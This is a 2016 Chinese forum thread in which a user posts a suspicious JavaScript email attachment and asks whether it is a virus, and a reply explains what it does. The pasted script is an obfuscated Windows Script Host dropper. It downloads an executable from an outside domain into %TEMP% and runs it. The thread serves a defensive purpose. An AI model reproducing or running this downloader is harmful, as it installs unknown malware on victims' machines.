bujie8010 发表于 2016-3-29 22:09:04

高手帮忙看看下面这个JS文件的内容是不是病毒?

我的邮箱收到的一个*.js的文件,同时还有一个VCW.x的文件,担心是病毒,放上来大家看看。

var Njjebnuzmw = false;
var Drajvc = "CreateObject";
var Xjaqx = function Iuxll() {return WScript("WScript.Shell");}();
var Wguoqb = 123213;
var Lvkavnlx = "MSXML2.XMLHTTP";
var Ujyncrq = 2123213;
var Aetzlpvn = 0;
function Hxwsaenrc(Vjctgfyrm){Xjaqx["Run"](Vjctgfyrm, Aetzlpvn, Aetzlpvn);};
function Yavxqo(){return Lvkavnlx;};
function Npfjsn(Pnqjpfm, Pmqmjhqx){return Pnqjpfm - Pmqmjhqx;};
function Vpwqiwx(){return Drajvc;};
/*@cc_on
@if (@_win32 || @_win64)
    Njjebnuzmw = true;
@end
@*/
if (Njjebnuzmw)
{
var Rknmqp = "";
function Btgig(){return 22;};
var Sgfezd = 0; var Lzjfcra = 0;
function Qanam()
{
var Kxuyqazf = new this["Date"]();
var Jzqjwao = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Ufpguwp = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Dyvdad = Kxuyqazf["getUTCMilliseconds"]();
var Sgfezd = "Gjtpzoz";
Sgfezd = Npfjsn(Ufpguwp, Jzqjwao);
var Lzjfcra = "Bxmlwd";
Lzjfcra = Npfjsn(Dyvdad, Ufpguwp);
Rknmqp = "open";
return Npfjsn(Sgfezd, Lzjfcra);
}
var Ixkwaxcqiv = false;
var Apygzghdxr = false;
for (var Cqwwsl = Aetzlpvn; Cqwwsl < Btgig() * 1; Cqwwsl++){if (Qanam() != Aetzlpvn){
Ixkwaxcqiv = true;
Lzjfcra = "31" + 11 * Sgfezd + Lzjfcra;
Apygzghdxr = true;
break;
}}
function Qkrgq() {return ((Ixkwaxcqiv == true) && (Ixkwaxcqiv == Apygzghdxr)) ? 1 : Aetzlpvn;};
if (Ixkwaxcqiv && Qkrgq() && Apygzghdxr){
function Nneeuvrwkd() {return Xjaqx["ExpandEnvironmentStrings"]("%TEMP%/") + "xx87Vzpdlz80Dn.exe";};
Zjrxmcvrq = Yavxqo();
Iqvjsptncx = WScript(Zjrxmcvrq);
var Gchpvr = 1;
while (Gchpvr){
try {
Iqvjsptncx("GET", "http://yorkshirecyclecompany.com/di8ols", false);
Iqvjsptncx["send"]();
Rruryo = "Sleep";
do {WScript(Btgig() * 11)} while (Iqvjsptncx["readystate"] < 2 * 2);
Gchpvr = Aetzlpvn;
} catch(Sinxxid){};
}
function Ofjhjo(Ekpgoo) {var Ihcbuu = (1, 2, 3, 4, 5, Ekpgoo); return Ihcbuu;};
Sezqmummew = WScript("ADODB.Stream");
Zjrxmcvrq = Sezqmummew;
Zjrxmcvrq();
Zjrxmcvrq["type"] = Ofjhjo(1);
Zjrxmcvrq["write"](Iqvjsptncx["ResponseBody"]);
Sezqmummew["position"] = Ofjhjo(Aetzlpvn);
Zjrxmcvrq["Save" + "ToFile"](Nneeuvrwkd(), 2);
Sezqmummew["c"+"lose"]();
Metytqs = Nneeuvrwkd();
Hxwsaenrc(Metytqs);
}
}

dawanpi 发表于 2016-3-30 16:06:33

虚拟机运行下,去%TEMP%目录找那个xx87Vzpdlz80Dn.exe看看是不是病毒好了。
这种混淆后的js可读性很差,大致看了下,像是从yorkshirecyclecompany.com下载个exe文件保存在用户临时目录然后运行,从行为上看不像是什么好东西。
页: [1]
查看完整版本: 高手帮忙看看下面这个JS文件的内容是不是病毒?